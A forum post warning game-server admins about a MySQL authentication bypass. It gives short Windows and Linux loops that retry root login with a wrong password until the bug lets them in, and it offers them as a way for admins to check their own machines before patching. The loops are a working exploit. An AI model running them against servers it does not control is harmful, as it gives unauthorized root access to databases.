MySQL Stupid Easy Exploit

[Hateborne]

Just throwing this out there, a minor exploit has come up for MySQL.

It affects very few setups from my understanding, but I am still passing this along.

http://isc.sans.edu/diary.html?storyid=13432
http://thehackernews.com/2012/06/cve...ous-mysql.html

Basically, with access to the machine (either locally or remotely), affected versions of MySQL are trivially easy to open up. Supposedly 1/256 chance to get in, which is disgustingly high.


To test for this on Windows, take the three command below and save into a bat file:

Code:

:Start
mysql -u root --password=lolwut 2>NUL
goto Start

To test for this on Linux, take ONE of these two and pass into terminal:

Code:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Code:

while true; do mysql -u root --password=bad; done

If any of the tests above bring up the mysql prompt (mysql>), your machine is vulnerable. Patch up or disable all remote access to database until a patch is made available.

-Hate




EDIT: I understand this is probably against the rules to post such exploits, but seeing as how I do not have an easy way to reach every single server admin(s)...this will have to do. If it's too much info, please copy this and pass it to every EQEMU server admin you can find, then delete the code sections.